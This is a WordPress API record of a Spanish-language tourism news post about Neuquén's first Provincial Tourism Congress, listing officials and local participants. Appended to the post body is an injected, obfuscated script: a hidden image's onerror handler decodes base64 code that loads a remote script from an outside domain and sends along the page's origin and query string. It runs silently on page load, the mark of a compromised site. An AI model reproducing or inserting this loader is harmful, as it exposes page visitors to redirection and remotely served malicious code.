{"id":9563,"date":"2025-05-14T08:50:27","date_gmt":"2025-05-14T11:50:27","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=9563"},"modified":"2025-08-13T15:28:33","modified_gmt":"2025-08-13T18:28:33","slug":"se-viene-el-primer-congreso-provincial-de-turismo-neuquen","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=9563","title":{"rendered":"Se viene el primer Congreso Provincial de Turismo Neuqu\u00e9n"},"content":{"rendered":"\n<p><strong><em>Ser\u00e1 en octubre y busca fortalecer los v\u00ednculos entre los distintos actores del sector. Se prev\u00e9 la participaci\u00f3n activa de la Facultad de Turismo, sumando su mirada acad\u00e9mica.<\/em><\/strong><\/p>\n\n\n\n<p>En un encuentro que reuni\u00f3 a representantes del \u00e1rea de Turismo de los destinos neuquinos de todas las regiones, se confirm\u00f3 la realizaci\u00f3n del primer Congreso Provincial de Turismo, el 8 y 9 de octubre en el Centro de Convenciones Domuyo de la ciudad de Neuqu\u00e9n.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/md.webp\"><img decoding=\"async\" width=\"992\" height=\"661\" data-id=\"9564\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/md.webp\" alt=\"\" class=\"wp-image-9564\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/md.webp 992w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/md-300x200.webp 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/md-768x512.webp 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/md-696x464.webp 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/md-630x420.webp 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/md-320x213.webp 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/md-480x320.webp 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/md-800x533.webp 800w\" sizes=\"(max-width: 992px) 100vw, 992px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/sm.webp\"><img decoding=\"async\" width=\"768\" height=\"512\" data-id=\"9565\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/sm.webp\" alt=\"\" class=\"wp-image-9565\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/sm.webp 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/sm-300x200.webp 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/sm-696x464.webp 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/sm-630x420.webp 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/sm-320x213.webp 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/sm-480x320.webp 480w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p>El evento, impulsado por Neuquentur, buscar\u00e1 fortalecer los v\u00ednculos entre los distintos actores del sector y promover un espacio de intercambio, reflexi\u00f3n y construcci\u00f3n colectiva. Se prev\u00e9 tambi\u00e9n la participaci\u00f3n de la Facultad de Turismo.<\/p>\n\n\n\n<p>El presidente de NeuquenTur,\u00a0<strong>Sergio Sciacchitano<\/strong>, encabez\u00f3 la jornada de trabajo junto a las directoras provinciales\u00a0<strong>Carolina Mol\u00edns<\/strong>,\u00a0<strong>Carolina Russo<\/strong>\u00a0y\u00a0<strong>Marisol Mendoza<\/strong>.<\/p>\n\n\n\n<p><strong><em>\u201cCreemos que va a ser una propuesta muy valiosa para el sector\u201d, empres\u00f3.<\/em><\/strong><\/p>\n\n\n\n<p>\u201cEstuvimos en la sede de ACIPAN trabajando con todos los secretarios, directores y referentes de turismo de cada rinc\u00f3n de la provincia, para plantear temas comunes que atraviesan a nuestra actividad. Hablamos del desarrollo, del v\u00ednculo con el sector privado y con otras \u00e1reas de gobierno. Esta es la actividad m\u00e1s federal que tiene la provincia de Neuqu\u00e9n y vamos a seguir fortaleci\u00e9ndola\u201d, a\u00f1adi\u00f3.<\/p>\n\n\n\n<p>Adem\u00e1s, durante el encuentro se dialog\u00f3 sobre la participaci\u00f3n de los destinos en el calendario de acciones institucionales, con el objetivo de acompa\u00f1ar desde NeuquenTur a cada una de las localidades, fortaleciendo el trabajo articulado y en equipo.<\/p>\n\n\n\n<p>En ese sentido, se alent\u00f3 a los representantes locales a involucrarse activamente en las actividades previstas: \u201cEs fundamental que est\u00e9n presentes, que lean el calendario y que participen\u201d.<\/p>\n\n\n\n<p>Estuvieron presentes\u00a0<strong>Alejandro Apaolaza<\/strong>\u00a0(San Mart\u00edn de los Andes),\u00a0<strong>Jimena Aguilar<\/strong>\u00a0(Villa La Angostura),\u00a0<strong>Wanda Kerekovic<\/strong>\u00a0(Villa Pehuenia-Moquehue),\u00a0<strong>Clarisa Vermeulen<\/strong>\u00a0(Villa Traful),\u00a0<strong>Celeste Scarabotti<\/strong>\u00a0(Chos Malal),\u00a0<strong>Solcir\u00e9 Luengo<\/strong>\u00a0(Alumin\u00e9),\u00a0<strong>Laura Chamlat<\/strong>\u00a0(Taquimil\u00e1n),\u00a0<strong>Rosa Mamani<\/strong>\u00a0(Plottier),\u00a0<strong>Francisco Valdez y Mart\u00edn Rucci<\/strong>\u00a0(Piedra del \u00c1guila),\u00a0<strong>Cynthia Rivera<\/strong>\u00a0(Pic\u00fan Leuf\u00fa),\u00a0<strong>Diego Cayol<\/strong>\u00a0(Ciudad de Neuqu\u00e9n),\u00a0<strong>Diego Bravo<\/strong>\u00a0(Andacollo),\u00a0<strong>Jos\u00e9 Antonio Casanova<\/strong>\u00a0(Tricao Malal),\u00a0<strong>M\u00f3nica Obadilla y Evangelina Aravena<\/strong>\u00a0(San Patricio del Cha\u00f1ar),\u00a0<strong>Mariana Hern\u00e1ndez y Adriana Galarza<\/strong>\u00a0(Villa El Choc\u00f3n),\u00a0<strong>Florencia Rocha<\/strong>\u00a0(Jun\u00edn de los Andes),\u00a0<strong>C\u00e9sar Croome<\/strong>\u00a0(Caviahue-Copahue), y\u00a0<strong>Gerardo Rocha y Hern\u00e1n Elgueta<\/strong>\u00a0(Las Lajas).<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/www.neuqueninforma.gob.ar\/noticias\/2025\/05\/12\/249271-se-viene-el-primer-congreso-provincial-de-turismo\" target=\"_blank\" rel=\" noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/www.neuqueninforma.gob.ar\/images\/custom\/logo-header.webp?_v=v3-46\" alt=\"\" style=\"width:183px;height:auto\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ser\u00e1 en octubre y busca fortalecer los v\u00ednculos entre los distintos actores del sector. Se prev\u00e9 la participaci\u00f3n activa de la Facultad de Turismo, sumando su mirada acad\u00e9mica. En un encuentro que reuni\u00f3 a representantes del \u00e1rea de Turismo de los destinos neuquinos de todas las regiones, se confirm\u00f3 la realizaci\u00f3n del primer Congreso Provincial [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":9565,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29,21,28],"tags":[],"class_list":["post-9563","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles","category-patagonia","category-portales-de-servicios-e-informacion"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9563","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9563"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9563\/revisions"}],"predecessor-version":[{"id":9926,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9563\/revisions\/9926"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/9565"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9563"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9563"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9563"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}